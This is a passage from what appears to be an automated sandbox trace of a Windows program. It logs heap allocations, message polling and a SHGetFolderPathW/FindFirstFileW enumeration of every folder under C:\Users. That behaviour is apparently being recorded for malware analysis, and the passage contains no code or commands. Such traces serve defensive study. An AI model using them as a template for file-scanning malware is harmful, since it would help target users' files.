(in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.450] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.450] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.450] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.450] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.450] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.450] PathFindFileNameW (pszPath="") returned="" [0146.450] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.450] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.450] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.450] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.450] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d98 | out: hHeap=0x6e0000) returned 1 [0146.450] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.450] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.450] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.450] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c70 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c70 | out: hHeap=0x6e0000) returned 1 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e708 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e740 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.451] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.451] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x498) returned 0x3219ec8 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.451] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d98 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d48 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d20 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cf8 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240960 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b18 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b40 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296400 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296428 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296450 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296478 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32964a0 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32964c8 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32964f0 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296518 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e778 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.452] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7e8 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c08 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240be0 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240bb8 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b90 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240938 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240988 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240aa0 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240dc0 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240de8 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3296270 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3296298 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32962c0 | out: hHeap=0x6e0000) returned 1 [0146.452] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32962e8 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3296310 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3296338 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3296360 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3296388 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32963b0 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32963d8 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c30 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c58 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ac8 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74d300 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e708 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e740 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3242ae8 | out: hHeap=0x6e0000) returned 1 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e740 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.453] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0146.453] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.453] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.454] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.454] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e698 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240848 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409d8 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e660 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a00 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32426a8 | out: hHeap=0x6e0000) returned 1 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.455] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.455] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.455] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 